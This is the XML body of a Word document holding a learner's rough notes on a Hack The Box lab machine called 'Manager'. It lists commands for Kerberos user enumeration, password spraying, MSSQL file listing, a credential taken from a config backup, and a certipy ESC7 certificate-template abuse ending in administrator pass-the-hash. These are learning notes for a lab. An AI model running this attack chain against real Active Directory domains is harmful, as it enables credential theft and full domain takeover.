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5611098E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HTB Machine:</w:t>
      </w:r>
      <w:r w:rsidR="00D32E73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manager</w:t>
      </w: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01361D45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  <w:r w:rsidR="000A5430">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> It’s a kind of easy machine where I obtain the perfect knowledge of how to change the password of account and how to set the password of the chain account.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0F501952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C57AA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57AA9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C57AA9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C57AA9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C57AA9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C57AA9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C57AA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57AA9"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190412CF" w:rsidR="00843DCE" w:rsidRDefault="00A859BA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0C72A5E6" w14:textId="28A1E7D1" w:rsidR="00A859BA" w:rsidRDefault="00A859B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cp /opt/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kerbrute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kerbrute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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47C82A" w14:textId="310667A1" w:rsidR="00A859BA" w:rsidRDefault="00A859B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kerbrute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userenum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-dc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manager.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00642CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00642CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00642CBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/usernames/xató-net-10-milloin-usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0455B81D" w14:textId="75CBA91A" w:rsidR="00A859BA" w:rsidRDefault="00093866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netexec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-k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D755F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D755F4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-u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ryan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D755F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’ -p ‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F2F5C7" w14:textId="1EC7D2A4" w:rsidR="00D755F4" w:rsidRDefault="00D755F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here we obtain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preauthentication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error. if we enter unknown user then we obtain different error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="1CACF9E9" w:rsidR="00843DCE" w:rsidRDefault="00D755F4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ntpdate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to set time to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC07F16" w14:textId="77777777" w:rsidR="006C2D00" w:rsidRDefault="006C2D00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75DA0825" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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obtain for guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487779F0" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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netexec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-k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‘guest -p ‘’ - -ride-brute = lists of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8DC7D4" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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copy all the users only and paste to the txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C37C91D" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="00170151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2D00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">password of the Username is the Username </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2D00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it self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with lower case in username and password both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B20BF" w14:textId="0487E911" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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lastRenderedPageBreak/>
        <w:t>netexec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username.txt -p username.txt - -no-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bruteforce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-continue-on-success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894169A" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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netexec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operator -p operator - -shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433FC44" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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netexec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mssql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operator -p operator = we login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961B33E" w14:textId="77777777" w:rsidR="00170151" w:rsidRDefault="00170151" w:rsidP="0017015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mssqlclient.py manager/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operator:operator@manager.htb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-windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="042612CA" w:rsidR="00843DCE" w:rsidRDefault="00170151" w:rsidP="0017015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we obtain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sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C2A148D" w14:textId="555F7B58" w:rsidR="00843DCE" w:rsidRDefault="00E1444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mssql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cheatsheet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F07E8FB" w14:textId="73AAAB58" w:rsidR="00E14448" w:rsidRDefault="00E1444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try with it as database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A26E94" w14:textId="58E767FA" w:rsidR="00E14448" w:rsidRDefault="00E1444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SELECT name FROM master..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sysdatabases</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; = but we cannot obtain anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724A3117" w14:textId="40118B42" w:rsidR="00E14448" w:rsidRDefault="00E14448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xp_dirtree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C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609340A0" w14:textId="08E8AB74" w:rsidR="00196501" w:rsidRDefault="00196501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xp_dirtree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C:\inetpub\wwwroot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A75CDD" w14:textId="70B8C0B8" w:rsidR="00196501" w:rsidRDefault="0019650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copy the zip file and past it website as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/zip so we can download it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769608A" w14:textId="318D358C" w:rsidR="00E14448" w:rsidRDefault="00B951D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old-conf.xml</w:t>
      </w:r>
      <w:r w:rsidR="007E07D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = here we obtain the password of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E07D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>revan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DFD904E" w14:textId="4BF6C312" w:rsidR="007E07D4" w:rsidRDefault="00A9596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evil-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revan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‘paste’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED209B9" w14:textId="2A93A3BA" w:rsidR="007E07D4" w:rsidRDefault="00A9596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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5AB848" w14:textId="77777777" w:rsidR="00E14448" w:rsidRDefault="00E14448" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B7D235" w14:textId="77777777" w:rsidR="00E14448" w:rsidRDefault="00E14448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40F603EF" w:rsidR="00843DCE" w:rsidRDefault="00D9270F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certipy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find -u raven -p ‘paste’ -dc-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stdout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-vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5179F" w14:textId="48E9771E" w:rsidR="00D9270F" w:rsidRDefault="00D61EA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here we obtain ESC7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googel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hacktricks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="350D5F0C" w14:textId="77777777" w:rsidR="00582ACF" w:rsidRDefault="00D61EA8" w:rsidP="00582ACF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certipy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ca -u raven -p ‘paste’ -dc-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-ca manager-dc01-ca -add-officer raven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92FF69" w14:textId="77777777" w:rsidR="00AD028F" w:rsidRDefault="00582ACF" w:rsidP="00AD028F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certipy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ca -u raven -p ‘paste’ -dc-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-ca manager-dc01-ca -enable-template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subca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C0F2829" w14:textId="72E5EFE9" w:rsidR="009C4187" w:rsidRDefault="00AD028F" w:rsidP="009C4187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certipy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ca -u raven -p ‘paste’ -dc-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-ca manager-dc01-ca -list-templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0411D2" w14:textId="1589D4C9" w:rsidR="00582ACF" w:rsidRDefault="009C4187" w:rsidP="00582ACF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certipy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C311B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u raven -p ‘paste’ -dc-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-ca manager-dc01-ca -template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subca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upn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administrator@manager.htb</w:t>
      </w:r>
      <w:r w:rsidR="00AD028F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504C86F" w14:textId="5F822ABE" w:rsidR="00E01CC8" w:rsidRDefault="00E01CC8" w:rsidP="00E01CC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request id is 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32590EB1" w14:textId="21021063" w:rsidR="00E01CC8" w:rsidRDefault="00E01CC8" w:rsidP="00E01CC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certipy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ca -u raven -p ‘paste’ -dc-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-ca manager-dc01-ca -issue-request 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D957864" w14:textId="0BDBFD3D" w:rsidR="00E01CC8" w:rsidRDefault="00E01CC8" w:rsidP="00E01CC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certipy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7519F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u raven -p ‘paste’ -dc-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-ca manager-dc01-ca -retrieve 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99B5F2" w14:textId="14AA10D9" w:rsidR="00E27AB0" w:rsidRDefault="007519F3" w:rsidP="00E01CC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certipy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auth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pfx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administrator.pfx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E27AB0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we obtain hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A825508" w14:textId="046DC967" w:rsidR="00E01CC8" w:rsidRDefault="00A5447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evil-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paste_hashes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administrator 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0D8C61" w14:textId="33087246" w:rsidR="00A311DF" w:rsidRPr="00DC79C4" w:rsidRDefault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8. Root Proof</w:t>
      </w:r>
      <w:r w:rsidR="0062439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62439C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= we obtain root as administrator </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00DC7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34C4D"/>
    <w:rsid w:val="000928F2"/>
    <w:rsid w:val="00093866"/>
    <w:rsid w:val="000A5430"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00170151"/>
    <w:rsid w:val="00196501"/>
    <w:rsid w:val="0025747B"/>
    <w:rsid w:val="0027157C"/>
    <w:rsid w:val="00383C25"/>
    <w:rsid w:val="00397CB4"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004D5E13"/>
    <w:rsid w:val="00582ACF"/>
    <w:rsid w:val="0062439C"/>
    <w:rsid w:val="00642CBD"/>
    <w:rsid w:val="00654B9E"/>
    <w:rsid w:val="006C2D00"/>
    <w:rsid w:val="00714747"/>
    <w:rsid w:val="007519F3"/>
    <w:rsid w:val="00760CA4"/>
    <w:rsid w:val="007E07D4"/>
    <w:rsid w:val="008116F6"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008B35BE"/>
    <w:rsid w:val="009C4187"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A466B5"/>
    <w:rsid w:val="00A54475"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A859BA"/>
    <w:rsid w:val="00A9596F"/>
    <w:rsid w:val="00AD028F"/>
    <w:rsid w:val="00B62D13"/>
    <w:rsid w:val="00B951DF"/>
    <w:rsid w:val="00C311B8"/>
    <w:rsid w:val="00C57AA9"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D32E73"/>
    <w:rsid w:val="00D61EA8"/>
    <w:rsid w:val="00D755F4"/>
    <w:rsid w:val="00D9270F"/>
    <w:rsid w:val="00DC79C4"/>
    <w:rsid w:val="00E01CC8"/>
    <w:rsid w:val="00E14448"/>
    <w:rsid w:val="00E15407"/>
    <w:rsid w:val="00E27AB0"/>
    <w:rsid w:val="00E867A4"/>
    <w:rsid w:val="00EC1576"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F8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57C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03A06-B9FE-4521-8865-5BB8560E4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42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T16:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>